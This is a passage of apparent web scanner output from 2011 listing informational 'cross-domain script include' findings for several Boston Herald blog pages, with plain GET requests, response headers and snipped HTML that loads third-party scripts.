<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.580. http://www.bostonherald.com/blogs/entertainment/disney_days/index.php/2011/01/26/castaway-cay-a-great-beach-stopover/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/entertainment/disney_days/index.php/2011/01/26/castaway-cay-a-great-beach-stopover/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/entertainment/disney_days/index.php/2011/01/26/castaway-cay-a-great-beach-stopover/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:55:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/disney_days/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 36596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<td bgcolor=#ffffff>
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

18.581. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:54:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...

18.582. http://www.bostonherald.com/blogs/lifestyle/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/lifestyle/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/lifestyle/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:51:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.583. http://www.bostonherald.com/blogs/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/news/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:54:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.584. http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:54:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/city_desk_wired/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...

18.585. http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/katy_on_the_campaign_trail/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/news/katy_on_the_campaign_trail/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:52:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://bostonherald.com/blogs/news/katy_on_the_campaign_trail/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<p><script type="text/javascript" src="http://video.foxnews.com/v/embed.js?id=4500319&#038;w=466&#038;h=263"></script>
...[SNIP]...
<!--
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at https://accounts.brightcove.com/en/terms-and-conditions/.
-->

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

18.586. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:52:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...

18.587. http://www.bostonherald.com/blogs/news/on_the_t/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/on_the_t/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/news/on_the_t/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:51:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/on_the_t/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 64725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<br>
<script src="http://admin.brightcove.com/js/BrightcoveExperiences.js" language="JavaScript" type="text/javascript"></script>
...[SNIP]...

18.588. http://www.bostonherald.com/blogs/sports/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/sports/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/sports/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:51:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.589. http://www.bostonherald.com/blogs/sports/celtics/index.php/2011/01/28/a-thorough-breakdown-of-kobe-bryants-supposed-clutchness/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/sports/celtics/index.php/2011/01/28/a-thorough-breakdown-of-kobe-bryants-supposed-clutchness/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/sports/celtics/index.php/2011/01/28/a-thorough-breakdown-of-kobe-bryants-supposed-clutchness/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:49:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/celtics/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

